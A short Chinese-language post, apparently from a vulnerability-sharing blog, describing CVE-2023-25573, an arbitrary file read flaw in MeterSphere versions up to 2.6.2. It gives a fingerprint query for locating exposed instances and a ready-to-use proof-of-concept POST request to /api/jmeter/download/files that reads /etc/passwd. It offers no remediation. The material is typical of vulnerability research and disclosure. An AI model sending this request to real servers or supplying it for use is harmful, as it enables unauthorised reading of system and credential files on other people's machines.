Metersphere file 任意文件读取漏洞 CVE-2023-25573
# Metersphere file 任意文件读取漏洞 CVE-2023-25573
## 漏洞描述
Metersphere file 接口存在任意文件读取漏洞,攻击者通过接口可以获取敏感文件压缩包
## 漏洞影响
Metersphere &...
Metersphere file 任意文件读取漏洞 CVE-2023-25573
漏洞描述
Metersphere file 接口存在任意文件读取漏洞,攻击者通过接口可以获取敏感文件压缩包
漏洞影响
Metersphere <=2.6.2
网络测绘
app.name="MeterSphere"
漏洞复现
登陆页面
验证POC
POST /api/jmeter/download/files
Content-Type: application/json
{"reportId":"pass","bodyFiles":[{"id":"aaa","name":"/etc/passwd"}]}
- 发表于 2024-07-12 18:46:31
- 阅读 ( 2290 )
- 分类:Web应用
带头大哥
456 篇文章